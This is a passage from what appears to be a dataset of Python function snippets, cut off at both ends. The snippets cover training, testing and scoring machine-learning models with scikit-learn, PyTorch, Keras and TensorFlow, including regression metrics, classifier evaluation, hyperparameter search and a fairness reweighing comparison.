eval_perf_total(model, X_train, y_train, X_test, y_test):\n\n y_hat_train = model.predict(X_train)\n y_hat_test = model.predict(X_test)\n \n train_mae = metrics.mean_absolute_error(y_train, y_hat_train)\n train_mse = metrics.mean_squared_error(y_train, y_hat_train)\n train_rmse = np.sqrt(metrics.mean_squared_error(y_train, y_hat_train))\n train_r = metrics.r2_score(y_train, y_hat_train)\n\n print('Evaluating Performance on Training Data:\\n')\n print(f' Train Mean Absolute Error: {train_mae:,.2f}')\n print(f' Train Mean Squared Error: {train_mse:,.2f}\\n')\n print(f'Train Root Mean Squared Error: {train_rmse:,.2f}')\n print(f'Train R-Square Value: {round(train_r,2)}')\n\n print('\\n'+'---'*25+'\\n')\n\n test_mae = metrics.mean_absolute_error(y_test, y_hat_test)\n test_mse = metrics.mean_squared_error(y_test, y_hat_test)\n test_rmse = np.sqrt(metrics.mean_squared_error(y_test, y_hat_test))\n test_r = metrics.r2_score(y_test, y_hat_test)\n\n print('Evaluating Performance on Testing Data:\\n')\n print(f' Test Mean Absolute Error: {test_mae:,.2f}')\n print(f' Test Mean Squared Error: {test_mse:,.2f}\\n')\n print(f'Test Root Mean Squared Error: {test_rmse:,.2f}')\n print(f'Test R-Square Value: {round(test_r,2)}')", "def eval_perf_train(model, X_train=None, y_train=None):\n\n # if X_train != None and y_train != None:\n\n y_hat_train = model.predict(X_train)\n \n train_mae = metrics.mean_absolute_error(y_train, y_hat_train)\n train_mse = metrics.mean_squared_error(y_train, y_hat_train)\n train_rmse = np.sqrt(metrics.mean_squared_error(y_train, y_hat_train))\n train_r = metrics.r2_score(y_train, y_hat_train)\n\n print('Evaluating Performance on Training Data:\\n')\n print(f'Train Mean Absolute Error: {train_mae:,.2f}')\n print(f'Train Mean Squared Error: {train_mse:,.2f}\\n')\n print(f'Train Root Mean Squared Error: {train_rmse:,.2f}')\n print(f'Train R-Square Value: {round(train_r,2)}')\n\n # if 
X_test != None and y_test != None:\n\n # y_hat_test = model.predict(X_test)\n\n # test_mae = metrics.mean_absolute_error(y_test, y_hat_test)\n # test_mse = metrics.mean_squared_error(y_test, y_hat_test)\n # test_rmse = np.sqrt(metrics.mean_squared_error(y_test, y_hat_test))\n # test_r = metrics.r2_score(y_test, y_hat_test)\n\n # print('Evaluating Performance on Testing Data:\\n')\n # print(f'Test Mean Absolute Error: {test_mae:,.2f}')\n # print(f'Test Mean Squared Error: {test_mse:,.2f}\\n')\n # print(f'Test Root Mean Squared Error: {test_rmse:,.2f}')\n # print(f'Test R-Square Value: {round(test_r,2)}')", "def run_model(Xp_train=None,y_train=None,Xp_test=None,y_test=None,mt='bl', params={}):\n models = { \n \"bl\": lambda : None,\n \"lr\": LinearRegression,\n \"dtr\": DecisionTreeRegressor,\n \"gbr\": GradientBoostingRegressor\n }\n\n # Select Model, returns None for baseline\n model = models[mt](**params)\n\n # Fit Model and make predictions\n if mt != 'bl': # If model not baseline\n # Dummy encoding , (each category of n levels or attributes is converted into n-1 dichotomous variables)\n X_train = pd.get_dummies(Xp_train, columns=['type', 'duration','location'],drop_first=True)\n X_test = pd.get_dummies(Xp_test, columns=['type', 'duration','location'],drop_first=True)\n model.fit(X_train,y_train)\n # Make Predictions\n y_pred = model.predict(X_test)\n #print X_test.shape\n y_predtr = model.predict(X_train) \n else: # Compute baseline\n y_pred = np.median(y_train).repeat(len(y_test))\n y_predtr = np.median(y_train).repeat(len(y_train))\n \n \n\n # Report metrics\n print(\"Model name: %s\" % (model.__class__.__name__ if model else \"Price Median Baseline\"))\n if mt != 'bl':\n print(\"hyper-parameters: \" + \", \".join( \"{0}: {1}\".format(k,v) for (k,v) in params.items() ) )\n print(\"Mean absolute error training set: %.2f\" % mean_absolute_error(y_train, y_predtr)) \n print(\"Mean absolute error testing set: %.2f \\n\" % mean_absolute_error(y_test, y_pred))", "def test_models(directorio=''):\r\n \r\n print('The trained models will be tested now')\r\n start = time.time()\r\n \r\n busqueda = \"ls \" + directorio + \"/*.h5 > model_names.txt\"\r\n\r\n os.system(busqueda)\r\n\r\n X = np.load(directorio + '/Xtest.npy')\r\n diccio = np.load(directorio + '/feature_standarisation.npy').item()\r\n y = pd.read_csv(directorio + '/dbtest.csv')['target'].values\r\n\r\n X = (X - diccio['mean'])/diccio['std']\r\n x = np.reshape(X,(X.shape[0],X.shape[2]))\r\n \r\n with open('model_names.txt','r') as f:\r\n for line in f:\r\n modelo = models.load_model(line[:len(line)-1])\r\n nombre = line.split('/')[1]\r\n outpred = modelo.predict(x)\r\n prediction = outpred >= 0.5\r\n \r\n cost = -(np.dot(y,np.log10(outpred)) + \\\r\n np.dot((1-y),np.log10(1-outpred)))/y.shape[0]\r\n precision,recall,fscore,support = PRFS(y, prediction)\r\n \r\n with open(directorio + '/test_results.txt','a') as tr:\r\n tr.write(nombre + '\\n')\r\n tr.write('cost function: '+str(cost[0])+'\\n')\r\n tr.write('samples: '+str(support)+'\\n')\r\n tr.write('precision: '+str(np.round(precision*100,2))+'\\n')\r\n tr.write('recall: '+str(np.round(recall*100,2))+'\\n')\r\n tr.write('f1-score: '+str(np.round(fscore*100,2))+'\\n')\r\n tr.write('\\n')\r\n tr.close()\r\n \r\n print('The test of all trained models lasted ', round(time.time()-start,2),' s')\r\n os.system('rm model_names.txt')\r\n \r\n return", "def _evaluate_during_fit(self, test_loader, epoch):", "def OTU_table_ML(OTU_table,metadata,obj_col):\n for ele in OTU_table.index:\n 
#print(ele)\n X.append(df.loc[ele])\n Y.append(metadata[obj_col][ele])\n precisions = []\n for train_time in range(100): \n X,Y = shuffle(X,Y)\n sample_num = len(X)\n sep_num = int(0.8*sample_num)\n train_set = [X[:sep_num],Y[:sep_num]]\n test_set = [X[sep_num:],Y[sep_num:]]\n clf = svm.SVC(gamma='scale')\n clf.fit(train_set[0], train_set[1]) \n predict_result = clf.predict(test_set[0])\n count = 0\n for i in range(len(predict_result)):\n if predict_result[i] == test_set[1][i]:\n count += 1\n else:\n pass\n precisions.append(1.0*count/len(predict_result))\n print(np.mean(precisions))", "def get_perf(self) :\n self.train()\n\n prediction = self.clf.predict(self.df_test.drop(columns = 'up')[:-1])\n self.accuracy = accuracy_score(df_test['up'][length:].values, prediction)\n tn, fp, fn, tp = confusion_matrix(df_test['up'][length:].values, prediction).ravel()\n self.recall = tp/(tp+fn)\n self.specificity = tn / (tn+fp)\n\n\n self.df_true = self.df_true[self.length:]\n\n profit = 1\n mini = 1\n maxi = 1\n self.df_true['close'] = self.df_true['close'].map(lambda x : np.exp(x))\n for s in range(1,len(self.df_true)):\n if prediction[x-1] == 1 :\n result = ((self.df_true['close'].iloc[s] -self.df_true['close'].iloc[s-1]) / self.df_true['close'].iloc[s-1]) + 1\n profit = profit * result\n if result < mini :\n mini = result\n if maxi < result :\n maxi = result\n self.mini = mini\n self.maxi = maxi\n self.profit = profit", "def fit(self) -> None:\n start_time = time.time()\n # ---- START -----\n train_df = self.processed_train_df[self.processed_train_df[self.filter_col_name]].dropna()\n train_features = train_df[self.feature_list]\n for label, model in zip(self.label_list, self.models):\n model.fit(train_features, train_df[label])\n # ---- END -----\n end_time = time.time()\n print(\"Finished fitting : elasped time : \" + str(end_time - start_time))", "def test_predictor():", "def test_training(self):\n\t\tpass", "def testModel( self, classTest, classPred):", "def test_variational():\n # iris\n #pres = \"Test pour le data set Iris (facile, classique)\"\n #test_from_func_variational(pres, 15, 10, 3, True, Iris)\n\n # breast cancer\n pres = \"Test pour le data set Breast Cancer (facile, classique)\"\n test_from_func_variational(pres, 15, 10, 3, True, Breast_cancer)\n\n # digits\n # pres = \"Test pour le data set Digits (difficile, classique)\"\n # test_from_func(pres, 10, 10, 10, True, Digits, quantum_instance)\n\n # wine\n # pres = \"Test pour le data set Wine (moyen, classique)\"\n # test_from_func(pres, 15, 10, 5, True, Wine, quantum_instance)\n\n # gaussian\n pres = \"Test pour des données gaussiennes (moyen, classique)\"\n for _ in range(1):\n print(\"\\n\")\n print(\"New iteration\")\n test_from_func_variational(pres, 25, 10, 2, True, Gaussian)\n print(\"\\n\")\n\n # small adn strings\n pres = \"Test pour des séquences ADN courtes (difficile, classique)\"\n test_from_func_variational(pres, 10, 15, 14, True, Sequence)\n\n #Quantum data\n pres = \"Test pour des données générées par ordinateur quantique (facile, quantique)\"\n print(pres)\n _, samp_train, samp_test, labels = ad_hoc_data(15, 10, 2, 0.3, True)\n sample_m, sample_p = stock_get(20, 0.3)\n\n labels_me = [-1, 1]\n samp_train_me = {-1: np.array(sample_m[:15]), 1: np.array(sample_p[:15])}\n samp_test_me = {-1: np.array(sample_m[15:]), 1: np.array(sample_p[15:])}\n print(samp_train)\n print(samp_train_me)\n print(samp_test)\n print(samp_test_me)\n\n my_impl_variational(samp_train, samp_test, labels)\n print(\"Pour autres données 
quantiques\")\n my_impl_variational(samp_train_me, samp_test_me, labels_me)", "def test_fit(self):\n X = self.generate_X()\n task = mmRDTR()\n fit_result = task.fit(X)", "def test(x_test, m_labels_test, ques_test, alpha, checkpoint_name, model_name, output_file_name):\n bestModel = pick_model(model_name, alpha)\n bestModel.load_state_dict(torch.load(checkpoint_name))\n bestModel.eval()\n best_scores = {}\n\n with torch.no_grad():\n test_pred = bestModel(x_test, m_labels_test)\n prec, recall, f1, df_output = get_qald_metrics(test_pred, m_labels_test, ques_test, mode='test')\n df_output.to_csv(output_file_name)\n print(\"Test -- f1 is {} \".format(f1))\n print(\"Test -- prec, recall, f1\", prec, recall, f1)\n best_scores['precision'] = prec\n best_scores['recall'] = recall\n best_scores['f1'] = f1\n\n # for name, mod in bestModel.named_modules():\n # if type(mod) == nn.ModuleList:\n # for name1, mod1 in mod.named_modules():\n # if 'cdd' not in name1 and 'AND' not in name1:\n # if 'batch' in name1.lower():\n # continue\n # elif 'or_max' in name1.lower():\n # continue\n # elif 'and' in name1.lower():\n # print(name1, mod1.cdd())\n # elif 'or' in name1.lower():\n # print(name1, mod1.AND.cdd())\n # else:\n # if 'cdd' not in name and 'AND' not in name:\n # if 'batch' in name.lower():\n # continue\n # elif 'or_max' in name.lower():\n # continue\n # elif 'and' in name.lower():\n # print(name, mod.cdd())\n # elif 'or' in name.lower():\n # print(name, mod.AND.cdd())\n return test_pred, best_scores", "def train(self): \n start_time = time()\n\n # reset previous results\n self.best_result = pd.DataFrame()\n self.result = pd.DataFrame()\n\n # Generate dictionaries of all posible parameter permutations\n keys, values = zip(*self.params.items())\n self.permutations_dict = [dict(zip(keys, v)) for v in itertools.product(*values)] \n\n # Run through all models in parallel threads\n with Pool(self.thread_cnt) as p:\n result = p.map(self.analyze_model, self.permutations_dict)\n\n\n # wrap up results\n if self.classes_names: # acts as trigger for computation of cms\n for i, dic in enumerate(result):\n dic[\"id\"] = i\n self.cms = [(dic[\"id\"] ,dic.pop(\"cm\")) for dic in result]\n\n self.result = pd.DataFrame(result)\n self.best_result = self.result.iloc[self.result[\"score\"].argmax()] # store row with the best score\n self.best_result = self.result.iloc[self.result[\"f1_score\"].argmax()] # store row with the best score\n self.best_result = self.result.iloc[self.result[\"recall\"].argmax()] # store row with the best score\n self.best_result = self.result.iloc[self.result[\"precision\"].argmax()] # store row with the best score\n end_time = time()\n print(\"Finished evaluation\")\n print(\"Best parameteters found with:\", self.best_parameter_set())\n print(\"score=\", self.best_score())\n #print(\"f1_score=\", self.best_f1_score())\n #print(\"recall_score=\", self.best_recall_score())\n #print(\"precision_score=\", self.best_precision_score())\n print(\"Total evaluation time = {:.2f}s\".format(end_time-start_time))\n\n return self.best_parameter_set(), self.best_score()", "def test(self, plot=False):\n accuracy_list = []\n fobj_avg = self.load_stats()\n\n for ii in range(settings.PARS['maxIters']):\n model = self.load_model(ii)\n D1 = model['D']\n W1 = model['W']\n\n # classification\n tic = time.time()\n accuracy_list.append(self.classification(D1, W1)[1])\n toc = time.time()\n print(\n 'Final recognition rate for OnlineDL is : {} , objective function value: {}, time: {}'\n .format(accuracy_list[ii], 
fobj_avg[ii], toc-tic)\n )\n\n accuracy_list = np.asarray(accuracy_list)\n\n print('Best recognition rate for OnlineDL is {} at iteration {}'.format(\n accuracy_list.max(), accuracy_list.argmax()))\n\n if plot:\n # plot the objective function values for all iterations\n plt.clf()\n plt.plot(list(fobj_avg.keys()), list(fobj_avg.values()), 'mo--', linewidth=2)\n plt.xlabel('Iterations')\n plt.ylabel('Average objective function value')\n plt.xticks(list(range(0, 20)), list(range(1, 21)))\n plt.show()\n\n plt.clf()\n plt.plot(accuracy_list, 'rs--', linewidth=2)\n plt.xticks(list(range(0, 20)), list(range(1, 21)))\n plt.xlabel('Iterations')\n plt.ylabel('Accuracy')\n plt.show()", "def model(classifier, data):\n print(\"Beggining to test model\")\n train, test = cross_validation.train_test_split(data, test_size=.30)\n f,c = train[:,1:], train[:,0]\n classifier.fit(f,c,False)\n print(\"Score: \" + classifier.score(f,c))\n print(\"Finished testing model\")", "def train(X : list, y : list, model_name : str, data, mode,*vals,**args):\n # 훈련 결과 dictionary\n scores = {}\n\n # 훈련 모드 선택\n\n model = MODELS[mode][model_name]\n\n X_train, X_val, y_train, y_val = train_test_split(data[X], data[y], train_size=0.7)\n \n model.fit(X_train, y_train)\n\n scores['train'] = validation(model, X_train, y_train, mode)\n scores['validation'] = validation(model, X_val, y_val, mode)\n\n return scores", "def do_stats_model(x, y):\n Xx = sm.add_constant(x)\n sm_logit = sm.Logit(y, Xx)\n result = sm_logit.fit()\n print result.summary()\n result.pred_table()\n # linear model\n print \"linear regression model:\\n\"\n sm_linear = sm.OLS(y, Xx)\n result = sm_linear.fit()\n print result.summary()", "def test_modele(self, data):\n\t\tif not isinstance(data, ndarray):\n\t\t\traise TypeError(\"erreur data = {} n'est pas de type numpy.ndarray \".format(type(data)))\t\t\t\n\n\t\t#result = self.session.run(tf.argmax(self.variable_mnsit[\"y_conv\"],1), feed_dict={self.variable_mnsit[\"x\"]: [data]})\n\t\t[tableau_pourcent, result] = self.session.run([self.y_conv, tf.argmax(self.y_conv, 1)], feed_dict={self.x : [data], self.keep_prob: 1.0})\n\t\tprint (\"l'ordinateur voit un ... 
{}\", result)\n\t\tprint (\"tableaux: {}\".format(tableau_pourcent))", "def model_performance_comparison(self, yvar, prev_group, C_FP, C_FN):\n trn_bl_df = self.reweigh()\n # sample_weights = self.reweigh(bl_df=trn_bl_df)\n\n s_weights = trn_bl_df.instance_weights\n print(s_weights)\n\n trainset = trn_bl_df.convert_to_dataframe()[0]\n testset = trainset\n\n X = trainset.loc[:, trainset.columns != yvar]\n y = trainset[yvar]\n #X_test = testset.loc[:, trainset.columns != yvar]\n #y_test = testset[yvar]\n\n X_test = X\n y_test = y\n\n clf_ww = sklearn.linear_model.LogisticRegression(random_state=999).fit(X, y, sample_weight=s_weights)\n clf_wow = sklearn.linear_model.LogisticRegression(random_state=999).fit(X, y)\n\n output_probabilities_to_csv(model=clf_ww, x_test=X_test, path='probs_ww_withprvgroup.csv',priv_group_col=trainset[prev_group], actuals=y_test)\n output_probabilities_to_csv(model=clf_wow, x_test=X_test, path='probs_wow_withprvgroup.csv', priv_group_col=trainset[prev_group], actuals=y_test)\n\n print(\"------------------------------------------\")\n print(\"Accuracy of Vanila Logistic Model\")\n print(\"------------------------------------------\")\n print(\"Without Weights : \", round(clf_wow.score(X_test, y_test), 3))\n print(\"With Weights : \", round(clf_ww.score(X_test, y_test), 3))\n\n X_test_age1 = testset.loc[:, trainset.columns != yvar][testset[prev_group] == 1.0]\n y_test_age1 = testset[yvar][testset[prev_group] == 1.0]\n X_test_age0 = testset.loc[:, trainset.columns != yvar][testset[prev_group] == 0.0]\n y_test_age0 = testset[yvar][testset[prev_group] == 0.0]\n\n wow = round(abs(clf_wow.score(X_test_age0, y_test_age0) - clf_wow.score(X_test_age1, y_test_age1)), 3)\n ww = round(abs(clf_ww.score(X_test_age0, y_test_age0) - clf_ww.score(X_test_age1, y_test_age1)), 3)\n\n #output_probabilities_to_csv(model=clf_ww, x_test=X_test_age0, path='probs_unpriv_ww.csv')\n #output_probabilities_to_csv(model=clf_ww, x_test=X_test_age1, path='probs_priv_ww.csv')\n #output_probabilities_to_csv(model=clf_wow, x_test=X_test_age0, path='probs_unpriv_wow.csv')\n #output_probabilities_to_csv(model=clf_wow, x_test=X_test_age1, path='probs_priv_wow.csv')\n\n print(\"\")\n print(\"\")\n print(\"--------------------------------------------------------------\")\n print(\"Difference in accuracy between privileged and unprivileged\")\n print(\"--------------------------------------------------------------\")\n print(\"without weights : \", wow)\n print(\"with weights : \", ww)\n\n Ypredclf = clf_ww.predict(X_test)\n Ypredclf2 = clf_wow.predict(X_test)\n withw = confusion_matrix(y_test, Ypredclf)\n without = confusion_matrix(y_test, Ypredclf2)\n print(\"\")\n print(\"\")\n print(\"--------------------------------------------------------------\")\n print(\"Confusion Matrix\")\n print(\"--------------------------------------------------------------\")\n print(\"without weights\")\n print(without)\n print(\"\")\n print(\"\")\n print(\"with weights\")\n print(withw)\n\n a, b, c, d = without.ravel() #(tn, fp, fn, tp)\n a1, b1, c1, d1 = withw.ravel() #(tn, fp, fn, tp)\n\n withweights = b1 * C_FP + c1 * C_FN\n withoutweights = b * C_FP + c * C_FN\n\n print(\"\")\n print(\"\")\n print(\"cost with weights: \", withweights)\n print(\"cost without weights: \", withoutweights)\n print(\"Has cost decreased after reweighing?\", withweights < withoutweights)\n\n print('')\n print('SUMMARY TABLE')\n\n cost = fr.CostingFairness(input_dataframe=self.data,\n label_names=['credit'],\n 
protected_attribute_names=['Age_previliged'],\n trained_model=clf_ww)\n\n metrics_table = self.generate_pre_train_metrics_table(model_without_weights=clf_wow,\n model_with_weights=clf_ww,\n test_set=testset,\n target=yvar,\n privileged=prev_group,\n false_positive_cost=C_FP,\n false_negative_cost=C_FN)\n priv_diff_table = generate_privileged_diff(metrics_table)\n delta_table = generate_delta_table(metrics_table)\n costs_table = cost.return_cost_fairness_accuracy_optimised()\n\n # pdf = PDF()\n # pdf.add_page()\n # pdf.write_table_to_pdf(metrics_table)\n # pdf.write_table_to_pdf(priv_diff_table)\n # pdf.write_table_to_pdf(delta_table)\n # pdf.output('TEST01.pdf', 'F')\n\n print(\"\")\n print(\"What we see is interesting, after re-weighing the bias of the model has decreased significantly by {}%, \"\n \"with a very slight decrease in accuracy as shown earlier\".format(round((wow - ww) * 100)))\n\n return metrics_table, priv_diff_table, delta_table, costs_table", "def test_all_false(directorio = str(), database = 'red_cod-db.pkl', \r\n local_function = 'fij_2.0_25_diccio'):\r\n df = pd.read_pickle(database)\r\n collection = pd.read_csv(directorio + '/compounds_collection.csv')\r\n \r\n cifs = [i for i in collection['cif']]\r\n maxsites = np.max(collection['sitios'])\r\n \r\n df = df[df['sitios'] > 0][df['sitios'] <= maxsites].reset_index(drop=True)\r\n df = df.loc[~df['cif'].isin(cifs)].reset_index(drop=True)\r\n \r\n x, _, df = inout_creator(df=df)\r\n \r\n x = compute_quotients(X=x)\r\n x, df = append_local_functions(X = x,df=df)\r\n \r\n busqueda = \"ls \" + directorio + \"/*.h5 > model_names.txt\"\r\n os.system(busqueda)\r\n \r\n diccio = np.load(directorio + '/feature_standarisation.npy').item()\r\n \r\n X = (x - diccio['mean'])/diccio['std']\r\n x = np.reshape(X,(X.shape[0],X.shape[2]))\r\n \r\n with open('model_names.txt','r') as f:\r\n for line in f:\r\n modelo = models.load_model(line[:len(line)-1])\r\n nombre = line.split('/')[1]\r\n \r\n outpred = modelo.predict(x)\r\n prediction = outpred >= 0.5\r\n df['y_pred'] = np.ravel(prediction)\r\n \r\n with open(directorio+'/test_with_all_false.txt','a') as tr:\r\n tr.write(nombre + '\\n')\r\n \r\n for sitios in range(1, max(df['sitios']) + 1):\r\n \r\n acc = df[df['sitios'] == sitios][df['y_pred'] == False].shape[0]\r\n miniset = df[df['sitios'] == sitios].shape[0]\r\n percent = round(100*acc/miniset,2)\r\n \r\n \r\n tr.write('With '+ str(sitios) + ' sites:' + str(percent) +\\\r\n '(' + str(miniset) + ' samples)' + '\\n')\r\n tr.close()\r\n return", "def train_eval_model(model, model_name, X_train, y_train, X_test, y_test):\n\n model_predictions_train = model.predict(X_train) # Wyniki regresji dla zbioru treningowego\n model_mse_train = mean_squared_error(y_train, model_predictions_train) # MSE dla zbioru treningowego\n model_rmse_train = np.sqrt(model_mse_train) # RMSE dla zbioru treningowego\n model_predictions_test = model.predict(X_test)\n model_mse_test = mean_squared_error(y_test, model_predictions_test)\n model_rmse_test = np.sqrt(model_mse_test)\n # Kroswalidacja modelu\n model_scores = cross_val_score(model, X_train, y_train, scoring=\"neg_mean_squared_error\", cv=10)\n model_rmse_scores = np.sqrt(-model_scores)\n\n model_result = ResultDataRegressors(model_name, model, model_rmse_train, model_rmse_test, model_rmse_scores)\n return model_result", "def eval_perf_test(model, X_test, y_test):\n\n y_hat_test = model.predict(X_test)\n\n test_mae = metrics.mean_absolute_error(y_test, y_hat_test)\n test_mse = 
metrics.mean_squared_error(y_test, y_hat_test)\n test_rmse = np.sqrt(metrics.mean_squared_error(y_test, y_hat_test))\n test_r = metrics.r2_score(y_test, y_hat_test)\n\n print('Evaluating Performance on Testing Data:\\n')\n print(f'Test Mean Absolute Error: {test_mae:,.2f}')\n print(f'Test Mean Squared Error: {test_mse:,.2f}\\n')\n print(f'Test Root Mean Squared Error: {test_rmse:,.2f}')\n print(f'Test R-Square Value: {round(test_r,2)}')", "def train_full_model(X,y_train):\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(X)\n\n #chose model\n # model = RandomForestClassifier()\n model = GradientBoostingClassifier()\n\n\n #train\n print(\"train model\")\n tic = time.time()\n model.fit(x_train,y_train)\n tac = time.time()\n print(\"elapsed time\", tac-tic)\n\n #save data\n save_data(model,scaler,x_train,y_train)", "def _model_train(df,tag,test=False):\r\n ## start timer for runtime\r\n time_start = time.time()\r\n \r\n X,y,dates = engineer_features(df)\r\n\r\n if test:\r\n n_samples = int(np.round(0.3 * X.shape[0]))\r\n subset_indices = np.random.choice(np.arange(X.shape[0]),n_samples,\r\n replace=False).astype(int)\r\n mask = np.in1d(np.arange(y.size),subset_indices)\r\n y=y[mask]\r\n X=X[mask]\r\n dates=dates[mask]\r\n \r\n ## Perform a train-test split\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25,\r\n shuffle=True, random_state=42)\r\n ## train a random forest model\r\n param_grid_rf = {\r\n 'rf__criterion': ['mse','mae'],\r\n 'rf__n_estimators': [50,100,250,500,1000],\r\n 'rf__max_depth': [5, 10, 20, 50],\r\n 'rf__min_samples_split': [2, 4, 8],\r\n 'rf__min_samples_leaf': [1, 2, 4]\r\n }\r\n pipe_rf = Pipeline(steps=[('rf', RandomForestRegressor())]) #Scaling not required for tree methods, robust to outliers\r\n grid_rf = RandomizedSearchCV(pipe_rf, param_distributions=param_grid_rf, cv=5, iid=False, n_jobs=-1)\r\n grid_rf.fit(X_train, y_train)\r\n y_pred = grid_rf.predict(X_test)\r\n eval_rmse_rf = round(np.sqrt(mean_squared_error(y_test,y_pred)),3)\r\n \r\n param_grid_mlp = {\r\n 'mlp__hidden_layer_sizes': [(30,),(30,10),(50,)],\r\n 'mlp__solver': [\"lbfgs\"],\r\n 'mlp__alpha': [0.01 ,0.001, 0.0001],\r\n 'mlp__max_iter': [500,1000],\r\n 'mlp__activation': ['relu','tanh']\r\n }\r\n pipe_mlp = Pipeline(steps=[('scaler', MinMaxScaler()),\r\n ('mlp', MLPRegressor())])\r\n grid_mlp = RandomizedSearchCV(pipe_mlp, param_distributions=param_grid_mlp, cv=5, iid=False, n_jobs=-1)\r\n grid_mlp.fit(X_train, y_train)\r\n y_pred = grid_mlp.predict(X_test)\r\n eval_rmse_mlp = round(np.sqrt(mean_squared_error(y_test,y_pred)),3)\r\n \r\n alg_dict={'rf':eval_rmse_rf,'mlp':eval_rmse_mlp}\r\n grid_dict={'rf':grid_rf,'mlp':grid_mlp}\r\n \r\n grid=grid_dict[max(alg_dict, key=alg_dict.get)]\r\n eval_rmse=max(eval_rmse_rf,eval_rmse_mlp)\r\n ## retrain using all data\r\n grid.fit(X, y)\r\n model_name = re.sub(\"\\.\",\"_\",str(MODEL_VERSION))\r\n if test:\r\n saved_model = os.path.join(MODEL_DIR,\r\n \"test-{}-{}.joblib\".format(tag,model_name))\r\n print(\"... saving test version of model: {}\".format(saved_model))\r\n else:\r\n saved_model = os.path.join(MODEL_DIR,\r\n \"sl-{}-{}.joblib\".format(tag,model_name))\r\n print(\"... saving model: {}\".format(saved_model))\r\n \r\n joblib.dump(grid,saved_model)\r\n\r\n m, s = divmod(time.time()-time_start, 60)\r\n h, m = divmod(m, 60)\r\n runtime = \"%03d:%02d:%02d\"%(h, m, s)\r\n\r\n ## update log\r\n msg='Model training - {0} model saved for country {1} after achieving accuracy {2}, versioned {3}. 
Training completed in {4}'.format(max(alg_dict, key=alg_dict.get),tag,eval_rmse,MODEL_VERSION,runtime)\r\n update_train_log(msg)", "def main():\n df = prepro_last()\n X, y = train_build(df)\n fit_store(X, y)", "def test_fit() -> None:\n mapie = MapieRegressor()\n mapie.fit(X_toy, y_toy)", "def _test(self,model, dataset):\n avg_loss = tfe.metrics.Mean('loss')\n accuracy = tfe.metrics.Accuracy('accuracy')\n\n for (images, labels) in tfe.Iterator(dataset):\n logits = model(images, training=False)\n avg_loss(self._loss(logits, labels))\n accuracy(\n tf.argmax(logits, axis=1, output_type=tf.int64),\n tf.cast(labels, tf.int64))\n print('Test set: Average loss: %.4f, Accuracy: %4f%%\\n' %\n (avg_loss.result(), 100 * accuracy.result()))\n with tf.contrib.summary.always_record_summaries():\n tf.contrib.summary.scalar('loss', avg_loss.result())\n tf.contrib.summary.scalar('accuracy', accuracy.result())", "def test(which, fitted_model_filename):\n click.echo(\"Mode: test.\")\n defaults = get_defaults()\n\n # bootstrap input\n fitted_model_path = os.path.join(defaults.OUTPUT.FITTED_MODELS_PATH, fitted_model_filename)\n new_options = [\"OUTPUT.FITTED_MODEL_PATH\", fitted_model_path]\n\n mode = \"{}_test\".format(which)\n boot_data = bootstrap(new_options, mode=mode)\n\n model = boot_data['model']\n X_test, y_test = boot_data['data']\n defaults = boot_data['defaults']\n\n eval_metrics = get_evaluation_metrics()\n # model = RandomForestClassifier(random_state=defaults.MISC.SEED, class_weight='balanced')\n\n # X_train, y_train = load_data(defaults, which='train')\n # scaler = StandardScaler()\n # numeric_cols = X_train.select_dtypes(include=np.number).columns.tolist()\n # X_train.loc[:, numeric_cols] = scaler.fit_transform(X_train[numeric_cols])\n\n # model.fit(X_train, y_train)\n\n test_results = test_performance(conf=defaults,\n model=model,\n X_test=X_test, y_test=y_test,\n eval_metrics=eval_metrics)\n results = pd.DataFrame(test_results.values(), index=test_results.keys(), columns=[\"test\"])\n\n results_filename = \"{}_results_{}.csv\".format(mode, fitted_model_filename.split(\".\")[0])\n results_path = os.path.join(defaults.OUTPUT.RESULTS_PATH, results_filename)\n results.to_csv(results_path)", "def fit(model, data, test_ids, exp_name, datasets):\n if model.model_type == 'torch':\n size = len(data[0])\n else:\n size = data[0].shape[0]\n \n train_ids = [i for i in range(size) if i not in test_ids]\n scaler = pka_scaler(data[1][train_ids])\n if model.data_type == 'descriptors':\n desc_scaler = StandardScaler()\n desc_scaler.fit(data[0][train_ids])\n data[0] = desc_scaler.transform(data[0])\n \n trained_model = train(model, train_ids, data, scaler, datasets)\n results = test(model, trained_model, test_ids, data, scaler)\n model.experiments.append({'name':exp_name,'model':trained_model, 'results':results, 'scaler':scaler})\n return results", "def fit():\n pass", "def test_evaluate():\n X_train, X_test, y_train, y_test = src.load()\n clf, score = src.train(X_train, y_train)\n test_score = src.evaluate(clf, X_test, y_test)\n assert isinstance(test_score, float)", "def test(self):\n with torch.no_grad():\n self.model.eval()\n p10_forecast, p10_forecast, p90_forecast, target = None, None, None, None\n\n t = time()\n for step, sample in enumerate(self.test_loader):\n\n # Hide future predictions from input vector, set to 0 (or 1) values where timestep > encoder_steps\n steps = self.cnf.all_params['num_encoder_steps']\n pred_len = sample['outputs'].shape[1]\n x = sample['inputs'].float().to(self.cnf.device)\n 
x[:, steps:, 0] = 1\n\n # Feed input to the model\n if self.cnf.all_params[\"model\"] == \"transformer\" or self.cnf.all_params[\"model\"] == \"grn_transformer\":\n\n # Auto-regressive prediction\n for i in range(pred_len):\n output = self.model.forward(x)\n x[:, steps + i, 0] = output[:, i, 1]\n output = self.model.forward(x)\n\n elif self.cnf.all_params[\"model\"] == \"tf_transformer\":\n output, _, _ = self.model.forward(x)\n else:\n raise NameError\n\n output = output.squeeze()\n y, y_pred = sample['outputs'].squeeze().float().to(self.cnf.device), output\n\n # Compute loss\n loss, _ = self.loss(y_pred, y)\n smape = symmetric_mean_absolute_percentage_error(output[:, :, 1].detach().cpu().numpy(),\n sample['outputs'][:, :, 0].detach().cpu().numpy())\n\n # De-Normalize to compute metrics\n target = unnormalize_tensor(self.data_formatter, y, sample['identifier'][0][0])\n p10_forecast = unnormalize_tensor(self.data_formatter, y_pred[..., 0], sample['identifier'][0][0])\n p50_forecast = unnormalize_tensor(self.data_formatter, y_pred[..., 1], sample['identifier'][0][0])\n p90_forecast = unnormalize_tensor(self.data_formatter, y_pred[..., 2], sample['identifier'][0][0])\n\n # Compute metrics\n self.test_losses['p10'].append(self.loss.numpy_normalised_quantile_loss(p10_forecast, target, 0.1))\n self.test_losses['p50'].append(self.loss.numpy_normalised_quantile_loss(p50_forecast, target, 0.5))\n self.test_losses['p90'].append(self.loss.numpy_normalised_quantile_loss(p90_forecast, target, 0.9))\n\n self.test_loss.append(loss.item())\n self.test_smape.append(smape)\n\n # Plot serie prediction\n p1, p2, p3, target = np.expand_dims(p10_forecast, axis=-1), np.expand_dims(p50_forecast, axis=-1), \\\n 